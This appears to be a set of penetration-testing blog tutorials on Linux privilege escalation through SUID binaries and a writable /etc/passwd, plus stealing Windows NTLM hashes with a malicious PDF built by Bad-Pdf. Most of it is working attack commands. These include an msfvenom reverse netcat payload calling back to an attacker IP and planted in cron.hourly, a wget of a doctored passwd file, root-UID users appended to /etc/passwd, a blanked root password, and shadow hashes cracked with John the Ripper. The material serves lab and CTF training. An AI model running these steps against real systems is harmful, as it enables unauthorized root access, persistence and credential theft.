Linux Privilege Escalation using SUID Binaries

In our previous article we have discussed “Privilege Escalation in Linux using etc/passwd file” and today we will learn “Privilege Escalation in Linux using SUID Permission.” While solving CTF challenges we always check suid permissions for any file or command for privilege escalation. It is very important to know what SUID is, how to set SUID and how SUID helps in privilege escalation. You can read our previous article where we had applied this trick for privilege escalation. Open the links given below:

Link 1:  Hack the Box Challenge: Bank Walkthrough

Link 2: Hack the Box Challenge: Haircut Walkthrough

Let’s Start with Theoretical Concept !!

As we all know in Linux everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read/write/execute. So when you set permission for any file, you should be aware of Linux users to whom you are going allow or restrict all three permissions. Take a look at the following image.

Hence it is clear that the maximum number of bit is used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set chmod 755, then it will look like as rwxr-xr-x.

But when special permission is given to each user it becomes SUID, SGID and sticky bits. When extra bit “4” is set to user(Owner) it becomes SUID (Set user ID) and when bit “2” is set to group it becomes SGID (Set Group ID) and  if other users are allowed to create or delete any file inside a directory then sticky bits “1” is set to that directory.

What is SUID Permission?

SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. Those files which have suid permissions run with higher privileges.  Assume we are accessing target system as a non-root user and we found suid bit enabled binaries, then those file/program/command can run with root privileges.

How to set suid?

Basically, you can change the permission of any file either using "Numerical" method or "Symbolic" method. As result, it will replace x from s as shown in below image which denotes especial execution permission with the higher privilege to a particular file/command. Since we are enabling SUID for Owner (user) therefore bit 4 or symbol s will be added before read/write/execution operation.

If you execute ls -al command with the file name and then you will observe symbol small ‘s’ as in above image then its means SUID bit is enabled for that file and it can be run with root privileges.

HOW SUID helps in privilege escalation?

In Linux, some of the existing binaries and commands can be used by non-root user to escalate privileges to root access if the SUID bit is enabled. There are some famous Linux/Unix executables commands that can let privilege escalation are: Bash, Cat, cp, echo, find, Less, More, Nano, Nmap, Vim.

Let's get into deep through practical work. First, create a user which should be not the sudo group user. Here we have added user “ignite” whose UID is 1001 and GID is 1001 and hence ignite is non-root user.

Privilege Escalation by Copy Command

If suid bit is enabled for cp command which is used to copy the data, then it can lead to privilege escalation to gain root access. For example, suppose you (system admin) want to give SUID permission for cp command. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which cp

ls -al /bin/cp

chmod u+s /bin/cp

1^st Method

On other hands start yours attacking machine and first compromise the target system and then move to privilege escalation phase. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

In above image, you can observe that it is showing so many files but we are interested in /bin/cp file. Because now we can copy /etc/password file for reading user list. Therefore I copy /passwd file inside HTML directory.

cp /etc/passwd /var/www/html

On other hands we have generated a new encrypted password: pass123 using OpenSSL passwd

We have copied /passwd file inside the web directory i.e. /var/www/html, therefore I can open it through the web browser then copied the entire content of /password file in a text file and after then we can add our own user with root UID, GID and directory.

In our previous article, we have already discussed how to add a user /etc/passwd using openssl passwd utility.

Run Python HTTP server for transferring our edited passwd file into target’s machine.

python -m SimpleHTTPServer 80

As we all know /tmp directory has all permission to create or delete any file, therefore, we have download our passwd file inside it.  Once it gets downloaded after then we copied the data of /tmp/passwd into /etc/passwd as result it will overwrite original passwd file.

cd /tmp

wget http://192.168.1.108/passwd

cp passwd /etc/passwd

With the help of tail command, we ensured that our user "hack" is either the part of /etc/passwd file. Since we have added our own user with root privileges let's get into the root directory.

su hack

whoami

And Yessssssss !! This is an incredible way to escalated root privilege.

2^nd Method

Similarly, we can also transfer our backdoor in target's system if SUID bit is enabled for cp command. Here we have generated natcat backdoor for reverse connect using msfvenom command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R

Then copy the above-highlighted code and paste in a text file by editing #!/bin/bash then ready to transfer it into target’s system, I have saved it as raj.sh.

Now we all are aware of Linux crontab utility that runs file hourly, daily, weekly and monthly and thus I copied raj.sh inside /etc/cron.hourly. Hence it will run raj.sh file after one hour.

cp raj.sh /etc/cron.hourly/

ls -al /etc/cron.hourly/

Other hands we started Netcat listener in a new terminal and as the hour past it gives reverse connect of target’s system with root privileges.

Hence we saw how a single cp command can lead to privilege escalation if SUID bit is ON. You can try your own way to escalated root privilege using cp command.

Privilege Escalation by Using Find Command

Similarly, we can escalate root privilege if SUID bit is ON for find command. For example, suppose you (system admin) want to give SUID permission for Find command. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which find

ls -al /usr/bin/find

chmod u+s /usr/bin/find

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for find command which means we can execute any command within find command. To do so first we create an empty file “raj” and then run whoami command as shown below.

touch raj

find raj -exec “whoami” \;

If an attacker successfully enumerated SUID bit for /usr/bin/find then it will allow him to execute any malicious command such netcat bin/bash shell or may fetch important system information for privilege escalation.

Privilege Escalation by Using Vim

Similarly, we can escalate root privilege if SUID bit is ON for Vim editor. For example, suppose you (system admin) want to give SUID permission for Vim editor. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim

ls -al /usr/bin/vim

ls -al /usr/bin/alternatives/vim

chmod u+s /usr/bin/vim.basic

You will found vim.basic through symlinking as shown in the below image.

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries who's having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /usr/bin/vim.basic and hence now we can edit any file which through vim that can be editable only by sudo or root user.

As we know ignite is non-root user who has least permissions, since vim has SUID permission, therefore, we can edit the sudoers file through it and can change permissions for user “ignite”. So we open sudoers file by typing visudo command and give all permission to user “ignite” as shown in the image.

ignite   ALL=(ALL:ALL) ALL

Now let access root directory as shown in below image.

sudo -l

sudo bash

id

Great!! This trick also work superbly for privilege escalations.

Privilege Escalation by Running Script

There are maximum chances to get any kind of script for the system or program call, it can be any script either PHP, Python or C language script. Suppose you (system admin) want to give SUID permission to a C language script which will provide bash shell on execution.

So here we have coded a c program which will call system for bash shell and saved it as “asroot.c”.

Then create a rootshell directory inside /bin directory and copied the asroot.c file in rootshell directory then run gcc compiler for compilation.

mkdir /bin/rootshell

cd /bin/rootshell

cp /home/raj/Desktop/asroot.c .

ls

gcc asroot.c -o shell

chmod u+s shell

ls -al shell

Now again compromise target’s system and use find command to identify binaries having SUID permission.

 find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for so many binary files but we are interested in /bin/rootshell/shell. So we move into /bin/rootshell directory and run the script “shell” as result we get root access as shown below.

cd /bin/rootshell

./shell

Id

Thus we saw how we can escalate root privilege if SUID bit is enabled for any script, although it is not possible to get such script which calls bash shell but if you found any script with SUID permission then using above techniques you can modify the content of that script to get the bash shell.

Privilege Escalation by Using Nano

Similarly, we can escalate root privilege if SUID bit is ON for nano editor. For example, suppose you (system admin) want to give SUID permission for nano editor. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim

ls -al /bin/nano

chmod u+s /bin/nano

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /bin/nano and now let’s open /etc/passwd file to edit own user as done above by using openssl passwd.

On other hands I have generated a new encrypted password: 123 using openssl passwd

Now open passwd file with nano editor and add your own user as done above. Here you can observe I have created demo user with encrypted password in victim’s system.

nano /etc/password

Since we have added our own user with root privileges let’s get into root directory.

su demo

id

2^nd Method

If suid bit is enabled for /bin/nano then we can steal the password from inside /etc/shadow file. So after compromising target’s machine we had opened shadow file in nano editor and copy the encrypted password set for user: raj.

Now paste above copy code into a text file and saved as hash on the desktop, after then used john the ripper to decode it as shown below. It has given raj: 123 as password, now try to login into target's system through raj account.

So Today we have demonstrated how the SUID permission can lead to privilege escalation even if it is allow to a normal copy, cat, nano, vim and so commands and programs.

Capture NTLM Hashes using PDF (Bad-Pdf)

Today we are demonstrating stealing NTLM hashes through a pdf file. We have already discussed the various method to Capture NTLM Hashes in a Network in our previous article. Recently a new tool has launched “Bad-PDF" and in this article, we are sharing our experience.

Bad-PDF create malicious PDF to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines, it utilizes vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.

This method work for all PDF readers(Any version) and java scripts are not required for this attack, most of the EDR/Endpoint solution fail to detect this attack.

git clone https://github.com/deepzec/Bad-Pdf.git

cd Bad.Pdf

ls

chmod 777 badpadf.py

Now run the python file with the help of following command given below:

python badpdf.py

Then it will try to connect with Responder through its default path i.e. /user/bin /responder but in our case, the location of the responder is user/sbin/responder. After then it will ask your network IP, the name of the output file and interface name, submit this information as per your network.

Then it will create a malicious pdf file with name bad.pdf, now transfer this pdf file to your target.

So, when the victim will click our malicious file, his NTLM hash will be captured as shown in below image. Here you can observe username ‘raj’ along with its hash password. Now copy the hash value in a text document so that you can crack this hash value for retrieving the password.

We have paste the hash value in a text file and save it as "hash" on the desktop. Later we had used John the ripper for cracking the hash.

john hash

Awesome!!! We have retrieved password: 133 for user: raj.

Privilege Escalation in Linux using etc/passwd file

In this article, we will focus on exploring diverse techniques to modify the etc/passwd file, enabling us to create or alter a user and grant them root privileges. It becomes crucial to understand how to edit your own user within the /etc/passwd file when dealing with privilege escalation on the compromised system. If you're interested, we have previously demonstrated this method for privilege escalation in our earlier articles. You can find the links below.

Table of Contents

About /etc/passwd file

·       Understand the basic

·       Adding new user to /etc/passwd file

Different methods to create passwd for /etc/passwd file

·       OpenSSL

·       Mkpasswd

·       Python

·       Perl

·       Php

·       Ruby

·       Bonus: Hack Trick

 

Firstly, we should be aware of /etc/passwd file in depth before reaching the point. Inside etc directory, we will get three most important files i.e. passwd, group, and shadow.

etc/passwd: It is a human-readable text file which stores information of user account.

etc/group: It is also a human-readable text file which stores group information as well as user belongs to which group can be identified through this file.

etc/shadow: It is a file that contains encrypted password and information of the account expire for any user.

The format of details in /passwd File

Get into its Details Description

Username: First filed indicates the name of the user which is used to login.

Encrypted password: The X denotes encrypted password which is actually stored inside /shadow file. If the user does not have a password, then the password field will have an *(asterisk).

User Id (UID): Every user must be allotted a user ID (UID). UID 0 (zero) is kept for root user and UIDs 1-99 are kept for further predefined accounts, UID 100-999 are kept by the system for the administrative purpose. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given the UID of 1001.

Group Id (GID): It denotes the group of each user; like as UIDs, the first 100 GIDs are usually kept for system use. The GID of 0 relates to the root group and the GID of 1000 usually signifies the users. New groups are generally allotted GIDs begins from 1000.

Gecos Field: Usually, this is a set of comma-separated values that tells more details related to the users. The format for the GECOS field denotes the following information:

User’s full name

Building and room number or contact person

Office telephone number

Shell: It denotes the full path of the default shell that executes the command (by the user) and displays the results.

 NOTE: Each field is separated by (colon)

Let’s Start Now!!

Adding User by Default Method

Let’s start with reading /etc/passwd file through cat command, to view the present users available in our system.

cat /etc/passwd

From the image given above, you can find that “pentest” is the last user with uid 1000. Here gid 1000 denotes it is a non-system user.

Let see what happened in ‘/passwd’ file, when we add any user with adduser command. So here you can clearly match the following information from below given image.

adduser user1

Username: user1

GID: 1001

UID: 1001

Enter password: (Hidden)

Home Directory: /home/user1

Other Filed: Full Name, Room Number, Work phone, Home Phone, Other (are blanked)

 

When you will open /passwd file then you will notice that all the above information has been stored inside /etc/passwd file.

 

Repeat the steps again and adding user2 into /etc/passwd file.

 

Now check with tail command, user2 is successfully added to /etc/passwd file and below information is updated accordingly.

GID: 1002

UID: 1002

Enter password: (Hidden)

Home Directory: /home/user1

 

For the privilege escalation it is required that /etc/passwd file must have ‘rwx’ permissions for the logged in user. So, we are giving ‘rwx’ permission to /passwd file for lab setup.

Chmod 777 /etc/passwd

 

Now our lab setup is done.

Possible Scenarios:

If /etc/passwd file is editable what would be the possible scenarios to escalate the privileges?

Scenario 1: Replace the password hash for existing users in /etc/passwd file with our encrypted password.

Scenario 2: Manually add a new root privilege user to /etc/passwd file with our encrypted password.

Scenario 3: Tempering the root or high privilege user password in /etc/passwd file.

Lets start now!

Connect with this machine with SSH:

ssh pentest@192.168.1.22

tail /etc/passwd

ls -al /etc/passwd

 

It is clearly visible that /etc/passwd file has all permissions.

OpenSSL

Sometimes, the execution of the passwd command for user password setup might not be feasible. In such situations, the OpenSSL command can be employed. This command generates a salted encrypted password.

OpenSSL is a widely used open-source library that provides various cryptographic functions, protocols, and tools for securing communications over computer networks. The openssl passwd command allows you to generate password hashes for different algorithms, such as DES, MD5, SHA-256, and more.

Method 1

Here, we generated password in our kali machine.

openssl passwd raj

 

$1 = indicates that the generated passwd in MD5 hash format.

Now use this salted password for “aarti” user using echo command to put password in etc/passwd.

echo ‘aarti:$1$cJ05ZYPP$06zg1KtuJ/CbzTWPmeyNH1:0:0:root:/root:/bin/bash’ >> /etc/passwd

here, you can observed that we have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user “aarti”. Now switch user and access the terminal through aarti and confirm the root access.

tail /etc/passwd

su aarti

id

 

Method 2

This becomes relevant when OpenSSL is present on the victim's system, allowing us to create passwords within the victim's machine itself.

openssl passwd 123

echo ‘user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash’ >> /etc/passwd

tail /etc/passwd

Now switch user and access the terminal through user3 and confirm the root access.

su user3

id

 

Cool!!! Both methods are working.

Mkpasswd

It is an alternate method of Openssl. mkpasswd is a command-line tool utilized for producing password hashes intended for diverse authentication systems.

mkpasswd -m <method> <password>

Here, <method> specifies the hash algorithm (like sha-512, md5, etc.), and <password> is the password you want to hash.

mkpa

sswd -m SHA-512 pass123

 

You can use the above similar method to add password to /etc/passwd file or manually edit.

nano /etc/passwd

In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user4.

 

Now switch user and access the terminal through user4 and confirm the root access.

su user4

id

Great!!! It is also working.

Python

Python allows us to add salt to our passwords, which will create an encrypted password that includes the salt value.

python2 -c 'import crypt; print crypt.crypt("pass123", "$6$salt")'

If above command is not working, you can use the python3 or check the installed python version with “which python” command.

python3 -c 'import crypt; print (crypt.crypt("pass123", "$6$salt"))'

 

Use any method to edit and put encrypted passwd into /etc/passwd file and switch to user5. Here we used nano editor.

su user5

id

 

It is also working.

Perl

Similar to this, we can create a hash value for our password using salt value using Perl along with crypt.

perl -le 'print crypt("pass123", "abc")'

 

You will get the encrypted password; repeat the manual step of adding new user "user6" and putting the encrypted value into the password field with the echo command in terminal.

echo ‘user6:abBxjdJQWn8xw:0:0:root:/root:/bin/bash’ >> /etc/passwd

here, you can see that we have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user6. Switch to new user user6

su user6

id

 

Great!! This method is also working.

PHP

The hash for our password may also be created using PHP along with crypt using the salt value.

php -r "print(crypt('aarti','123') . \"\n\");"

 

You will get the encrypted password; repeat the same method of adding new user "user7" and putting the encrypted value into the password field with the echo command in terminal.

echo ‘user7:121z.fuKOKzx.:0:0:root:/root:/bin/bash’ >> /etc/passwd

In below image you can observe that we have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user7.

tail -n 2 /etc/passwd

su user7

id

 

Working!!!

Ruby

As we have already use Python, Perl, PHP in the same way Ruby can be used for creating encrypted password along with crypt using the salt value.

ruby -r ‘digest’ -e ‘puts “pass”.crypt(“$6$salt”)’

 

Use any of above way to edit /etc/passwd and switch to new user user8

su user8

id

 

This is also working.

Bonus: Hack Trick

If you are lazy to perform any of above methods you should try this!!!

If /etc/passwd file is having -rwxrwxrwx permissions in victim system, open /etc/passwd file and remove the ‘X’ or ‘*’ value at the place of root password. As shown in image below:

 

Methodology: The 'x' value in the /etc/passwd file indicates that the actual password hash is stored in the /etc/shadow file (or a similar location), rather than in the /etc/passwd file itself.

If you remove the 'x' value and replace it with something else or leave it blank, the root user's password will no longer be stored securely and the system won't be able to authenticate the root user using the stored password hash from the /etc/shadow file.

Keep the root password blank and save the /etc/passwd file.

root::0:0:root:/root:/bin/bash

 

Now, switch to root user

su root

id

Boom… you have the root access without passwd. You can use this method on other high privilege user roles.

Hence there are so many ways to escalate privileges via editable /etc/passwd.